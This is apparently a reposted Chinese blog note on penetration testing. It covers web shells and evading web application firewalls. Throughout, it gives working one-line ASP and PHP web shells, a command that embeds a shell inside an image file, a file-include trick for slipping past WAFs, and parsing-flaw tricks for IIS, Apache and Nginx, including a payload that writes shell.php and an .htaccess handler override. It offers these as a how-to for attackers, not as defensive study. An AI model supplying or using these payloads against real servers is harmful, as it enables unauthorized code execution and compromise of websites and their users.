渗透:WAF&木马

一句话木马

asp:<%eval request("heroes")%>

php:<?php @eval($_POST[value]);?>

asp:<%@ Page Language="Jscript"%>

       <%eval(Request.Item["value"])%>

一句话木马制作:

c32:把图片放入里边,再写入一句话

cmd:copy /b 1.jpg+1.asp 2.jpg

win7下右键图片,在属性->详细信息->版权内插入一句话

小马体积小,容易隐藏,与图片结合一起上传后可以利用nigx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能。

大马体积比较大,一般50K以上。功能丰富,一般包含提权命令,磁盘管理,数据库连接接口,执行命令,有些甚至可以压缩/解压缩网站程序。这种马的隐蔽性较差,大多数代码如果不加密的话会被杀。

文件包含绕过waf

1,上传包含文件bao.asp:<!--include file="1.jpg"--> 将当前文件目录下1.jpg包含到asp中执行

2,上传图片文件1.jpg:其中其实是木马

waf不会发现1.jpg中的内容,也不会对包含文件进行拦截,因为其中没有恶意代码。

文件解析漏洞

一些特殊文件被iis、apache、nginx在某种情况下被解释成脚本文件的漏洞。

IIS5.x-6.0解析漏洞

1,目录解析:/xx.asp/1.jpg

在网站文件夹下建立文件夹名字为.asp、.asa的文件夹,其目录内的任何扩展名的文件都会被IIS当成asp文件来解释或执行

2,文件解析:cracer.asp;.jpg

在IIS6.0下,分号后边的不被解析。除了asp之外还有.asa/.cer/.cdx

Apache解析漏洞

Apache从右向左开始判断解析,如果为不可识别解析,就再往左判断。比如cracer.php.owf.rar,“.owf”和".rar"Apache不能识别,于是就会最终解析成cracer.php

IIS7.0/IIS7.5/Nginx<8.03畸形解析漏洞

在默认Fast-CGI开启的状况下,上传一个名为cracer.jpg的文件,其中内容为<? PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>然后访问cracer.jpg/.php,在这个目录下就会生成一句话木马shell.php

www.xxx.com/logo.gif/*.php触发漏洞(有漏洞会把前面文件当成php执行)

htaccess文件解析

如果在Apache中,.htaccess可被执行且可被上传,则可以尝试在其中写入:

<FilesMatch "shell.jpg">  SetHandler application/x-httpd-php  </FilesMatch>

然后再上传shell.jpg木马,这样就可以将其解析成.php文件

原文地址:https://www.cnblogs.com/bl8ck/p/9520956.html